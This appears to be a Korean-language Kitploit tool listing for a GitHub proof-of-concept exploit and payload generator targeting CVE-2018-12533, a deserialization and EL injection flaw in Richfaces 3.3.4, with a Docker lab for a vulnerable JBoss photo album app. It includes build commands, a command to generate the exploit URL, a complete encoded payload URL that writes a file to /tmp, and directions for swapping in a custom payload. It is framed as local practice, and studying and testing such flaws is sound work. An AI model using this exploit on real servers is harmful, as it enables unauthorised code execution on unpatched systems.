Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2018-12533 — CVE-2018-12533(Richfaces 역직렬화/EL 인젝션)을 위한 페이로드 생성기 및 개념 증명(PoC) 익스플로잇으로, 실습용 Docker 기반 취약 환경을 포함합니다. | Kitploit
도구/GitHubGitHub/llamaonsecurity/cve-2018-12533
Vulnerability AnalysisExploitationWeb Application ExploitationPapers & ResearchPayload DevelopmentLabs & Practice
GitHubllamaonsecurity/cve-2018-12533

CVE-2018-12533

CVE-2018-12533(Richfaces 역직렬화/EL 인젝션)을 위한 페이로드 생성기 및 개념 증명(PoC) 익스플로잇으로, 실습용 Docker 기반 취약 환경을 포함합니다.

저장소 보기
911395년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

RF-14310 / CVE-2018-12533 페이로드 생성기

Lucifaer 연구 기반

모든 크레딧은 https://github.com/Lucifaer 로

참고 자료

https://access.redhat.com/security/cve/cve-2018-12533

richfaces-jboss-poc

오래된 Java 버전 등에 대해 너무 걱정하지 않고 Richfaces 3.3.4 역직렬화 + EL 주입 공격을 연습할 수 있는 손쉽게 배포 가능한 개념 증명입니다.

jboss Docker 배포

취약한 애플리케이션을 설정하는 번거로움을 덜기 위해, CVE-2018-14667을 설명하는 seclist 문서의 지침을 바탕으로 Dockerfile을 만들었습니다. 저장소 루트 디렉터리에서 다음 명령어를 실행하기만 하면 됩니다:

root@kitploit:~
docker build -t richfaces-jboss .
docker run -p 8081:8080 richfaces-jboss

모든 것이 정상적으로 작동하면 http://127.0.0.1:8081/photoalbum 에서 richfaces photoalbum 테스트 애플리케이션에 접속할 수 있습니다.

저장소 루트 디렉터리에서 poc를 fat jar로 컴파일 (docker와 작동하는 pom으로 쉬움)

root@kitploit:~
cd CVE-2018-12533
docker run -v ~/.m2:/root/.m2 -v $(pwd):/usr/src/app maven:3.5-jdk-8 mvn -f /usr/src/app/pom.xml clean package install

POC URL 생성

root@kitploit:~
java -jar target/cve_2018_12533.jar 

jboss 서버의 URL로 이동

/tmp에 파일을 생성하는 것 외에 다른 작업을 하려면 /DATA/XXXXX 부분을 자신의 페이로드로 변경하세요. 이 페이로드는 /tmp/hacked.txt를 생성합니다. http://127.0.0.1:8081/photoalbum/a4j/s/3_3_3.Finalorg.richfaces.renderkit.html.Paint2DResource/DATA/eAHNUk1r1UAUnfegVq2L-oEiItQo-goyKSJu6gOxFX2QWukTwbp4zEtuk2knM-nkpo0W3Qmi4satIOJKUBD9Be6k4KY!QQRxIYggLvVOUlssuDebXGbOnHPuufflVzaQW3bG2JhbGSZzIoScW9AR2AWJPMFU8StCajw1OQO5KWwIxzqpiGFSoGi!X!s4!OvF6yYb7LDtvX48YZSxHTbYmzM2FeiqBGScULWttywjTGbZjlCECYi-goAN9CKiQbYnmBdLwldCx!50fx5CHA!oReaEF9kd1igzVn9N-pWMNU6yjHwfd89KXrsOTZoZDRp5lzjhklHURFcsgb2--rb9-MmHqSZrBqSvRJ5fFin8rdtFK3VMujtzehNVHMj2186k8btgpVDylnM-XmZO!gRJ8rzQlQEFmHNQPIBYhDenABMTnZc6ItJ1740mawSskSI7VLGWPii!Bl4oMwt5Lo0m6n8xXxXxVvQf5l2UimUH6zjIxFbcG3!1waefpx9RfITbu4Hb1H1-9373--zaWYdwDo64lZjvm7xqaitfJ81U!9uBH0Pvdk85bTekoeWH7N7RFQuLBeTIY8AJl3RrdKMMjKCR0IGior70nBXuBs9nCo0yBa!C14Itj1g2z6VeMgvQ0oVSoxxKCFsemiJMRnxMMz8R4QJEHEv0Rm8zVlCfN6qca!r1-b5au!b5y-GVi1WfFF8T2b7KgzR8usCsQAKCoCENb1qrdzLLyuVn7OnIubGTYyNtLyQYwoTRSDvX!l8a98rfWVxP3w__.jsf

별도의 터미널에서 셸에 접속하여 페이로드 성공 여부 분석

root@kitploit:~
docker ps
docker exec -it <containerid> bash
ls /tmp

기본 상태에서 익스플로잇을 사용하면 /tmp/cve_2018_12533이 생성되므로, 이 방법으로 익스플로잇이 작동했는지 확인할 수 있습니다.

도구 다운로드